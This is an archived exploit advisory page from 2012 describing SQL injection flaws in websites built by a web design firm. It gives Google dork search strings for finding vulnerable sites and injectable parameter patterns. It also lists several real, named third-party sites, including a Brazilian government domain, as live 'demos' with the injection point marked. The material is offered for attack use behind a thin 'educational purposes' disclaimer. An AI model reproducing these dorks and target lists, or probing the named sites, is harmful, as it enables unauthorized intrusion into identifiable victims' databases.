Exploit the possiblities

Vetor Design SQL Injection

Vetor Design SQL Injection
Posted Sep 15, 2012
Authored by TUNISIAN CYBER

Vetor Design based sites suffer from multiple remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, remote, vulnerability, sql injection
MD5 | d42c6b2c5c82b2840d4b22e9ff22e061

Vetor Design SQL Injection

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title: Vetor Design SQL Injection Vulnerability
[+] Date: 15-09-2012
[+] Category: WebApp
[+] Google Dork:
intext:"Desenvolvido por Vetor Design." .php?lid=
intext:"Desenvolvido por Vetor Design." .php?lid=
intext:"Desenvolvido por Vetor Design." .php?cat=
intext:"Desenvolvido por Vetor Design." .php?cat=
[+] Tested on: Windows 7 Professionnel / Windows Server 2008
[+] Vendor: http://www.vetor.net/

####################################################################################


#################################################################################
||| ~~ Use It At Your Own Risk ~~ |||
||| It's For Educational Purpos Only |||
||| I'm not Responsible For Any Damage |||
#################################################################################

Examples

127.0.0.1/produtos_linha.php?lid=[SQLi]
127.0.0.1/noticias.php?cat=[SQLi]
127.0.0.1/fotos.php?cid=[SQLi]
127.0.0.1/catProjetos.php?cid=[SQLi]

#################################################################################

Demos:
http://www.bompel.com.br/produtos_linha.php?lid=12'
http://www.agricolahorizonte.com.br/noticias.php?cat=12'
http://www.musicallstudio.com.br/portfolio.php?cid=9'
http://www.willmutt.com.br/fotos.php?cid=3'
http://www.arlenarquitetura.com/catProjetos.php?cid=22'
http://www.calcadosbeiralago.com.br/produto.php?id=12'
http://www.marechal.fm.br/conteudo.php?id=26'
http://www.patobragado.pr.gov.br/evento.php?id=4'
http://www.lfzagronegocio.com.br/intercambio.php?id=12'

More in Google =)

áÇ Çáå ÇáÇ Çááå ãÍãÏÇ ÚÈÏå æÑÓæáå
æÃäÒá ÚÞÇÈÇ ÃáíãÇ Úá ßá ãä íÊØÇæá Úáì ÇáÅÓáÇã æÇáãÓáãíä
ÑÍã Çááå ßá ãä ÊæÝì

./3nD
########################################################################################
Greets to: TN H4CK3RZ( Badi - xMax-tn - Silent_hill - pipo issam - anas laribi - xtech set) , r00tw0rm members and Inj3ct0r Team
###########################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

 • Su
 • Mo
 • Tu
 • We
 • Th
 • Fr
 • Sa
 • 1
  Jan 1st
  2 Files
 • 2
  Jan 2nd
  13 Files
 • 3
  Jan 3rd
  16 Files
 • 4
  Jan 4th
  39 Files
 • 5
  Jan 5th
  26 Files
 • 6
  Jan 6th
  40 Files
 • 7
  Jan 7th
  2 Files
 • 8
  Jan 8th
  16 Files
 • 9
  Jan 9th
  25 Files
 • 10
  Jan 10th
  28 Files
 • 11
  Jan 11th
  44 Files
 • 12
  Jan 12th
  32 Files
 • 13
  Jan 13th
  2 Files
 • 14
  Jan 14th
  4 Files
 • 15
  Jan 15th
  31 Files
 • 16
  Jan 16th
  15 Files
 • 17
  Jan 17th
  16 Files
 • 18
  Jan 18th
  24 Files
 • 19
  Jan 19th
  15 Files
 • 20
  Jan 20th
  5 Files
 • 21
  Jan 21st
  0 Files
 • 22
  Jan 22nd
  0 Files
 • 23
  Jan 23rd
  0 Files
 • 24
  Jan 24th
  0 Files
 • 25
  Jan 25th
  0 Files
 • 26
  Jan 26th
  0 Files
 • 27
  Jan 27th
  0 Files
 • 28
  Jan 28th
  0 Files
 • 29
  Jan 29th
  0 Files
 • 30
  Jan 30th
  0 Files
 • 31
  Jan 31st
  0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close